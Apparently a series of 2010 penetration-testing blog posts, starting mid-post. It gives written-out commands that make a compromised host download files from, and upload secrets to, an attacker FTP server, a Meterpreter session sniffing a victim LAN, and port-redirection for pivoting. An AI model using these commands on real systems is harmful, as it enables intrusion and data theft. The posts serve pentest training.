In these examples our attacking system (here given the example address 192.168.1.10) has an FTP server running, hosting our malicious files (in this case, test.txt).

FTP in a non-interactive shell to a Windows system

For a Windows system, this is relatively easy because the Windows version of FTP supports the "-s" option.

This enables an attacker to create a script of FTP commands, and then run that script on the remote system.

The script containing the FTP commands can be put on the remote system by echoing commands to a new file using the shell. This sounds complicated, but is literally a question of pasting something like the following blob of commands into the shell (the address and password are example values; note the space before the first redirect - without it, cmd would treat the digit before the ">" as a file-handle number and mangle the port):

echo open 192.168.1.10 21 > ftp.txt
echo anonymous>> ftp.txt
echo password>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt

This script file can then be checked with the following command. Each line above has created a line in the script file on the remote system:

type ftp.txt

open 192.168.1.10 21
anonymous
password
bin
get test.txt
bye

This can then be executed on the remote system, like this:

ftp -s:ftp.txt

This works well and is quick and easy in a Windows shell, however, the task is slightly more complex on a Linux system.

FTP in a non-interactive shell to a Linux system

Normally the FTP client on Linux does not have the "-s" option, so we will need to build a shell script to execute the FTP commands. Something like this will work (ftp.sh and the host address are example values):

echo "#!/bin/sh" >> ftp.sh
echo "HOST='192.168.1.10'" >> ftp.sh
echo "USER='anonymous'" >> ftp.sh
echo "PASSWD=''" >> ftp.sh
echo "FILE='test.txt'" >> ftp.sh
echo "" >> ftp.sh
echo "ftp -n \$HOST <<BLAH" >> ftp.sh
echo "quote USER \$USER" >> ftp.sh
echo "quote PASS \$PASSWD" >> ftp.sh
echo "bin" >> ftp.sh
echo "get \$FILE" >> ftp.sh
echo "quit" >> ftp.sh
echo "BLAH" >> ftp.sh
echo "exit 0" >> ftp.sh

When pasted into a non-interactive shell, the above commands will produce a script file, "ftp.sh", on the remote victim.


The file contents should look like this:

#!/bin/sh
HOST='192.168.1.10'
USER='anonymous'
PASSWD=''
FILE='test.txt'

ftp -n $HOST <<BLAH
quote USER $USER
quote PASS $PASSWD
bin
get $FILE
quit
BLAH
exit 0

To make the script executable and run it, simply execute the following commands:

chmod 777 ftp.sh
./ftp.sh

...and this will use FTP to download our test file to the target system.

Using this technique it would be relatively easy to put additional files on the victim system, such as connectivity tools, privilege-escalation exploits and back-doors, and also to copy files from the victim system using the same method (with a put rather than a get).
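As a sketch of that put variant (the host address and filenames below are placeholders), the same echo technique can build an upload script on the victim; nothing touches a real FTP server until the generated script is actually run:

```shell
# Build an upload (put) script using the same echo technique
# (192.168.1.10 and secrets.txt are placeholder values)
echo "#!/bin/sh" > upload.sh
echo "HOST='192.168.1.10'" >> upload.sh
echo "USER='anonymous'" >> upload.sh
echo "PASSWD=''" >> upload.sh
echo "FILE='secrets.txt'" >> upload.sh
echo "ftp -n \$HOST <<BLAH" >> upload.sh
echo "quote USER \$USER" >> upload.sh
echo "quote PASS \$PASSWD" >> upload.sh
echo "bin" >> upload.sh
echo "put \$FILE" >> upload.sh
echo "quit" >> upload.sh
echo "BLAH" >> upload.sh
chmod +x upload.sh
```

Running ./upload.sh on the victim would then push secrets.txt back to the attacker's FTP server.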

Adding the "echo"s to your own scripts

So, say you have some commands you want to put onto the remote system as a script. It would be a bit of a pain to manually add all those "echo"s to each line, so here is an easy way to add the prepended "echo", and the appended ">> file.txt", to each line (script.sh here stands in for your local file of commands):

cat script.sh | sed 's/^/echo "/' | sed 's/$/" >> file.txt/' | sed 's/\$/\\\$/g' > ftpecho.txt

(This command would be used on the attacking system, to prepare the blob of echo commands you want to paste into the non-interactive shell. It also escapes the $ characters which were used in the Linux script above for shell-script variables.)
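To see the transformation in action (sample.sh is an illustrative stand-in for the script you want to transfer, and file.txt the target name used above):

```shell
# create a small sample script to transform
cat > sample.sh <<'EOF'
#!/bin/sh
ftp -n $HOST
EOF

# wrap each line in an echo, append the redirect, then escape the $ signs
cat sample.sh | sed 's/^/echo "/' | sed 's/$/" >> file.txt/' | sed 's/\$/\\\$/g' > ftpecho.txt

cat ftpecho.txt
# prints:
# echo "#!/bin/sh" >> file.txt
# echo "ftp -n \$HOST" >> file.txt
```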

Saturday, 27 November 2010

Metasploit: Using the Meterpreter sniffer extension to collect remote network traffic

Once an attacker has gained a foot-hold by compromising an initial host, one of the first things he needs to do is some basic host and network reconnaissance, in order to see "where he is" and "what he can do next".

One of the techniques that could be used is passive network reconnaissance, i.e. packet-sniffing to "listen" to the victim's LAN for interesting traffic. Here we explore how to do this with the Metasploit Meterpreter sniffer extension.

Please remember to use these techniques only for legitimate penetration testing, not for malicious purposes. Every action you take has consequences, and you will be heir to the results of your actions.

Broadcast traffic

Several protocols broadcast interesting traffic, and capturing internal LAN traffic can be very useful to an external attacker, to assist in information-gathering and compromising further systems in the "soft underbelly" of the internal LAN.

You can find out a lot about a network by running a packet sniffer such as wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile, so installing an application where one did not previously exist is not a wise idea.

Using the Metasploit Meterpreter sniffer extension means that no additional software is installed, no files are written to disk; everything is stored in memory, and all communications between the attacker and victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)

Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows:

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help


Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself) and we go ahead and start the sniffer on the first interface:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

During the capture, we can check progress of the collection by issuing a sniffer stats command:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 32178
        packets: 211

...and then dump some traffic:

meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
/root
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap

So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, to see if there is any data there also:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap

Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap network capture files, we can examine them locally at our leisure on the attacker system. This can be done with a nice graphical tool like Wireshark, to filter the traffic and see what we could learn about the remote victim network.

Here we filter Netbios/SMB broadcast traffic to see what systems we can see on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN)

Other filters could be applied to other broadcast traffic, such as address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services such as file and print.
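As an illustration, each line below is a separate Wireshark display filter that could be typed into the filter bar against the downloaded pcap files (the # annotations are mine, and are not part of the filter syntax):

```
nbns || browser    # NetBIOS name service and SMB browser announcements
arp                # address resolution
bootp              # DHCP (the filter is named dhcp in newer Wireshark versions)
cdp                # Cisco Discovery Protocol advertisements
```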

Using these methods, we can gather a list of live IP addresses, address ranges, and machine types, and all this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.


Once a single system is compromised, it is only a matter of a short time before an attacker can gather enough local information to "pivot" and extend the attack to other local systems.

In secure environments, it is vitally important that every host is secured. This includes virtual hosts and test systems, as these could also be used as a bridgehead to silently sniff, or attack, other systems on the internal LAN.

Also, it is important that there is sufficient network segmentation, internal firewalling, and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.

Backtrack 4 tips: KDE Konsole tabs

When working with Backtrack 4, it is common to have multiple shells open (I do this all the time)

You may want one for a Metasploit console, one for a Python shell, one for generating some shellcode, one for a reverse shell listener, port redirection, tcpdump/tshark etc. (Well, this is how I work anyway.)

Here is a top tip for managing your many shells.

KDE Konsole tabs

KDE Konsole lets you have tabbed shells (so use them well). Tabs are displayed along the bottom of the window (or the top if you prefer).

To work efficiently with several concurrent shells:
  1. Open a few Konsole tabs in the same window by clicking on the new tab window (bottom left button)
  2. Quickly label your tabs (Ctrl + Alt + S) and enter a name (It only takes a few seconds, and saves hunting for the right shell!)
  3. To scroll between shell tabs use Shift + arrow keys
  4. To move your shell tabs around, use Ctrl + shift + arrow keys
  5. Add more shells (Ctrl + shift + N) and label them as you need them
  6. Exit the ones you don't need any more with the button at the bottom right (there is no shortcut for this, which prevents mistakes!)

I find this makes managing many shells a lot easier. Rather than have lots of windows open, you can see what you have open all in one place and "Shift-arrow" between them, and then "Alt-tab" to your other applications and back. (The keyboard is a lot quicker than a mouse ;o)

I can easily and quickly manage 10 to 15 shells at once with these methods - that's probably as many as I have ever needed.

Switching desktops

I often use more than one desktop. Maybe I have some web-browsing on one screen, some course material under review on another, and an exploit-development setup going on another.

If you want to fast-switch between desktops in KDE, then the keyboard shortcut is "Ctrl-F1", for the first screen, "Ctrl-F2" for the second, etc...

(It took me a while to find that one, but it is pretty handy; I was used to "Ctrl-ArrowKeys" in Gnome.)

Tuesday, 23 November 2010

Backtrack 4 R2 released - my first upgrades and use of it today

I have been playing around with the latest release of Backtrack (Version 4 R2, which was released on Friday) for most of today.

Backtrack is the world's best Linux distribution for ethical hacking and penetration testing, with hundreds of tools built in, configured, and ready to go.

The latest distribution can be downloaded from here, and this is a screenshot from one of the systems I upgraded this morning, from a DVD ISO image I cut with Brasero.

This is a Dell Mini10 system, which can be a bit fussy with drivers etc, but everything worked fine out of the box. Even the boot-splash works this time (using the "fix-splash800" command).

For my other test system I used the alternative method to get to R2, using the following commands.

apt-get update && apt-get dist-upgrade

This was a pretty quick process, and apart from my Firefox shortcuts disappearing, pretty seamless.

I've been using these systems all day and haven't found any issues yet, so all good so far.

Monday, 22 November 2010

Using winrelay or fpipe for port redirection via a Windows host

When attacking networks in a pentest, it is sometimes useful to be able to redirect tcp or udp traffic, via an intermediary system.

This may be to obfuscate the source of the attack, or perhaps because the victim host (IP address and port combination) is not directly accessible from the attacking machine.

This is commonly used in pivoting, i.e. attacking an initial host, and then using that compromised system to attack other systems on the network which were not initially accessible.

Here we look at, and test, two Windows command-line tools which can be used for port redirection: winrelay and fpipe.

These techniques should only be used on your own test systems, or where you have express permission to do penetration testing.

winrelay (by Arne Vidstrom)

This tool can be downloaded here and there are various options:

Let's look at an example:
The command below would be run on the intermediary system. The victim system in this case is a web server listening on port 80.

C:\>winrelay.exe -lip <intermediary-ip> -lp 81 -dip <victim-ip> -dp 80 -proto tcp

WinRelay 2.0 - (c) 2002-2003, Arne Vidstrom

This can be tested easily by using netcat from the attacking system and typing a simple HTTP GET request. For example:

nc -nvv <intermediary-ip> 81
(UNKNOWN) [<intermediary-ip>] 81 (?) open

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:05:55 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

sent 17, rcvd 306

So that worked fine, but winrelay doesn't log any connections to the screen, so there is not much to see on the intermediary system.

In my testing I also tried using wfuzz to brute-force some common webserver file locations on my victim system via the relay, and it worked well.

Fpipe.exe from Foundstone

This tool can be downloaded here and, again, there are various options, so we will do a similar test to the one above:

C:\Documents and Settings\Administrator\Desktop>fpipe -l 82 -c 512 -r 80 <victim-ip>
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.

Pipe connected:
   In: -->
  Out:  -->
Pipe connected:
   In: -->
  Out:  -->

As you can see, Fpipe logs connections to the screen, so there is more to see, and the HTTP GET request test from the attacking system (below) works as expected.

nc -nvv <intermediary-ip> 82
(UNKNOWN) [<intermediary-ip>] 82 (?) open
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:14:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

 sent 17, rcvd 306

However, I had difficulty getting the web brute-force attack to work through fpipe. I will have to take a look with Wireshark, when I have more time, to see what was going wrong...

Saturday, 20 November 2010

Adobe PDF Reader X: the world's most dangerous desktop application gets a fix

Let's face it; the security record of Adobe has not been good over the past few years, with an increasing number of exploits for Adobe products available in the wild.

These have frequently made network security professionals' jobs difficult, with several 0-day PDF vulnerabilities meaning that attackers could easily penetrate network defenses using a client-side attack, for example by sending a malicious PDF document in an email or via a URL.

The difficulty of blocking these threats

These attacks have been very difficult to do anything about, especially as the malicious documents could be specially crafted as part of a sophisticated spear-phishing attack, with uniquely created or encoded payloads. This is a lot easier than it sounds if you have the knowledge, and there is no way that a signature-based anti-virus tool would have been able to stop such targeted attacks.

Also, as usage of PDF documents is ubiquitous in the commercial world, there was no way that system administrators could justify blocking all PDFs at the boundary.

A solution

Thankfully Adobe Reader X is here, which uses sandbox technology to isolate threats in PDF documents. It may take a while before most enterprises deploy this software to all of their computer systems; meanwhile the door is still open for attackers. (I am sure there are more vulnerabilities still to be discovered in older versions of Adobe Reader.)

So, if you are a security manager or sysadmin, and are keen to secure your network from this type of attack, I suggest you put a plan together to roll this out to all of your desktops and laptops, as soon as you can.

Pentesting with Backtrack and the OSCP certification vs more theoretical courses

I am a firm believer that IT Security certification should have a big element of practical and real-world training and testing.

Having studied and passed the CISSP and CISM certifications, I can speak from experience that these don't really teach someone how to defend a company from malicious attack, nor do they cover any detail of the techniques that modern attackers will use to penetrate networks.

It seems to me that CISSP, CISM, and even CEH (Certified Ethical Hacker) are a class of exam that teaches "information" rather than "knowledge". I feel that true knowledge comes from real experience, and the practical application of information and techniques.

I am not knocking CISSP, CISM, or CEH; these certifications are great, and give a very good background in IT Security from either a management or technical perspective. In addition, these certifications require you to submit proof of a level of work experience in IT Security.

What I am saying, is that I feel security experts need real world "offensive" experience to truly understand threats. I also feel that it is important for exams to prove practical skills, which is why I would recommend the Offensive Security courses.

A comparison: theoretical vs practical exams

CISSP is a 6 hour exam of multiple choice questions. Read the question (several times) and then tick box A, B, C or D - for 6 hours.

It's a tough certification, and some of the questions are worded in an awkward way. It covers an extremely broad field of IT Security, so it proves you can memorize and recall lots of information, but I feel it does not prove what you can do, or what you truly know.

Compare that to an exam like OSWP (which I passed earlier this year) in which you have 4 hours to break into several secured wireless access points, and write a report to prove what you have found and how - It's a different ball game altogether, and I have to say, it was the most enjoyable exam I have ever taken!

I am currently in the process of studying Pentesting with Backtrack, which culminates in a 24 hour live pentest exam, where you have to break into various systems.

You then have a further 24 hours to write up and submit your results in a professional penetration test report. (Apparently most students stay awake and work for the full 24 hours of the pentest, so it's no walk in the park.)

What are the benefits of practical exams?

Clearly, if you are looking to be a real-world penetration tester, there is no better training, or proof that you know what you know, than practical courses and exams like the ones offered by Offensive Security.

If you are a network defender, the techniques learned on a course like PwB are invaluable in teaching you the importance of patch management, secure coding, secure configurations, and the dangers of information leakage and poor passwords. It will also likely improve your general networking know-how on Linux and Windows systems.

For example; In my view, there is nothing like the experience of cracking a file full of password hashes, in a few seconds, to make you have a much better appreciation of what makes passwords secure, and to change your behavior to choose better passwords.

I certainly choose better passwords now ;o)

My recommendation

To be a well-rounded and knowledgeable IT Security professional, you need a mix of training and certifications - some theoretical, and some very practical.